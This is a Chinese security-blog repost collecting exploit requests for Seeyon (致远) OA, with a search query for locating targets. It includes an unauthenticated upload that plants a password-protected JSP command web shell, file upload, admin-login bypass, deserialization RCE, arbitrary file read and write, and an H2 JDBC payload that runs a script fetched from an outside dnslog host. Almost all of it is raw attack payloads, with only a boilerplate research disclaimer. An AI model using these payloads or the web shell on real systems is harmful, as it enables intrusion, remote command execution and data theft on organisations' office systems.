致远oa合集POC在野

admin 2024年8月12日21:43:53评论138 views字数 5611阅读18分42秒阅读模式

网络测绘:title="致远A8-V5协同管理软件 V6.1sp1"

影响版本:致远A8-V5协同管理软件V6.1sp1

致远oa合集POC在野

致远 OA 协同管理软件无需登录 getshell
访问验证:ip/seeyon/htmlofficeservlet

构造 PoC
DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlVOPTION=S3WYOSWLBSGrcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66CREATEDATE=wUghPB3szB3Xwg66RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6originalFileId=wV66originalCreateDate=wUghPB3szB3Xwg66FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6needReadFile=yRWZdAS6originalCreateDate=wLSGP4oEzLKAz4=iz=66<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("calsee".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>>a6e4f045d4b8506bf492ada7e3390d7ce
访问 webshell  可知当前权限
/seeyon/testtesta.jsp?pwd=calsee&cmd=cmd+/c+dir
 

致远oa合集POC在野

致远OA_V8.1SP2文件上传漏洞

POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)Accept-Encoding: gzip,deflateCookie:JSESSIONID=5bGx5rW35LmL5YWzCache-Control: no-cacheContent-Encoding: deflatePragma: no-cacheHost: 1.1.1.1Accept: text/html,image/gif, image/jpeg,*; q=.2,*/*; q=.2Content-Length:522729Connection: closeX-Forwarded-For: 1.2.3.4
arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}
致远OA任意管理员登录


POST /seeyon/thirdpartyController.do HTTP/1.1
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

致远oa合集POC在野

截图保命------------------------------------------------------------
致远 M3 反序列化 远程命令执行漏洞(XVE-2023-24878)
漏洞信息:
https://x.threatbook.com/v5/vul/6bf25402a41b4fc27497a5b42a8421d7ef38d57cb7d8143dedb9a6f438310a2d9e083c39c56fee2571651827b4d9ce8d

利用 CB1 生成 hex 反序列化数据,替换 POC 中的 HEX

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_82116c626a8d504a5c0675073362ef6f=1666334057Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: application/jsonContent-Length: 3680
[{"userMessageId":"{"@u0074u0079u0070u0065":"u0063u006fu006du002eu006du0063u0068u0061u006eu0067u0065u002eu0076u0032u002eu0063u0033u0070u0030u002eu0057u0072u0061u0070u0070u0065u0072u0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0050u006fu006fu006cu0044u0061u0074u0061u0053u006fu0075u0072u0063u0065","u0075u0073u0065u0072u004fu0076u0065u0072u0072u0069u0064u0065u0073u0041u0073u0053u0074u0072u0069u006eu0067":"u0048u0065u0078u0041u0073u0063u0069u0069u0053u0065u0072u0069u0061u006cu0069u007au0065u0064u004du0061u0070:HEX;"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]
然后再 Get 访问/mobile_portal/api/systemLog/pns/loadLog/app.log致远 OA wpsAssistServlet 任意文件读取(XVE-2023-25300)

POST /seeyon/wpsAssistServlet HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
flag=template&templateUrl=C:/windows/system.ini

致远OA ajax.do任意文件写入
POST /seeyon/ajax.do HTTP/1.1Host: 192.168.24.144:8089Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=77F3CDD0BF63F73259CD2BEC7B442801; hostname=192.168.24.144:8089; loginPageURL=; login_locale=zh_CNConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 183method=ajaxAction&managerName=fileToExcelManager&managerMethod=saveExcelInBase&arg uments=["C:SeeyonA8ApacheJetspeedwebappsseeyonROOT/ceshi.txt","",{"columnName":[ 'HelloWorld']}]

 

致远OA ajax.do反序列化

POST /seeyon/ajax.do?method=ajaxAction&managerName=syncConfigManager HTTP/1.1 Host: 192.168.24.144:8089Cache-Control: max-age=0
   Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=e8bf99e698af63766573e5ae9ee9aa8ce5aea4e79a84706f63; hostname=192.168.24.144:8089; loginPageURL=; login_locale=zh_CNConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 174managerMethod=checkIsCreate&arguments=["","org.h2.Driver","jdbc:h2:mem:testdb;TRACE_LE VEL_SYSTEM_OUT=3;INIT=RUNSCRIPT%20FROM%20'http://.dnslog.cn'","a","","",""]

 

 

原文始发于微信公众号(左逆安全攻防):2023致远oa合集POC在野

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日21:43:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远oa合集POC在野https://cn-sec.com/archives/2008275.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息